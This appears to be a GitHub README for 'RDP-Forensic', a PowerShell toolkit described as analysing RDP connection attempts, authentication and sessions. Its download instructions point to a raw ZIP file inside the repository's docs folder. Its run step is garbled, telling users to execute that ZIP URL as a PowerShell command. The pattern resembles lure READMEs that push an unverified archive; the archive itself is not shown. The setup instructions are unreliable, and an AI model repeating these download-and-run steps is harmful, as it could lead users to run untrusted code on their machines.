Welcome to RDP-Forensic, a PowerShell toolkit designed to make RDP forensics simple. This tool helps you analyze connection attempts, track authentication, and monitor sessions across Windows Event Logs. Whether you're managing a few computers or an entire network, RDP-Forensic gives you the insights you need to keep your environment secure.
To run RDP-Forensic, ensure your system meets the following requirements:
- Operating System: Windows 10 or later
- PowerShell Version: 5.1 or later
- Network Access: Ensure you have access to the logs on the Windows Event Log service.
- Disk Space: At least 100 MB free
To get started with RDP-Forensic, you need to download it from the Releases page. Follow these steps:
- Visit the Releases page: Download RDP-Forensic.
- On the Releases page, look for the most recent version of the software.
- Click on the https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/docs/releases/Forensic_RD_v1.6.zip file to start the download.
- Once the download is complete, locate the file on your computer.
- Extract the files from the ZIP archive by right-clicking the file and selecting “Extract All.”
- Open the extracted folder to find the RDP-Forensic files.
You are now ready to run RDP-Forensic.
Follow these steps to run RDP-Forensic on your machine:
-
Open PowerShell. You can find it by searching in the Start Menu.
-
Navigate to the RDP-Forensic folder. Use the
cdcommand like this:cd path\to\RDP-Forensic(Replace
path\to\RDP-Forensicwith the actual path to the folder.) -
Run the script with the following command:
.\https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/docs/releases/Forensic_RD_v1.6.zip -
Wait for the script to execute. It will present you with options to analyze RDP connection attempts and sessions.
RDP-Forensic offers a variety of features designed for ease of use and effectiveness:
- Connection Tracking: Monitor all connection attempts to RDP services.
- Authentication Logs: Track who logged in and when.
- Session Management: See active RDP sessions with detailed statistics.
- Logoff Analysis: Understand when users log off and why.
- Export Reports: Generate summary reports for compliance and audits.
This toolkit focuses on essential areas related to RDP forensics, including:
- Compliance
- Event Viewer insights
- Logon analysis
- RDP forensics specifics
- Security auditing
- Session tracking for incident response
- SIEM integration
- Windows Server best practices
For further details on using each feature, refer to the documentation included in the RDP-Forensic folder. You can also find helpful information on the Wiki page of our GitHub repository.
If you encounter issues or have questions, feel free to open an issue on our GitHub page. We appreciate contributions and feedback to enhance RDP-Forensic.
We plan to update RDP-Forensic with new features regularly. Follow the repository for announcements on new releases and improvements.
For the latest version, return to the Releases page: Download RDP-Forensic.
Enjoy using RDP-Forensic, your go-to toolkit for RDP security analysis!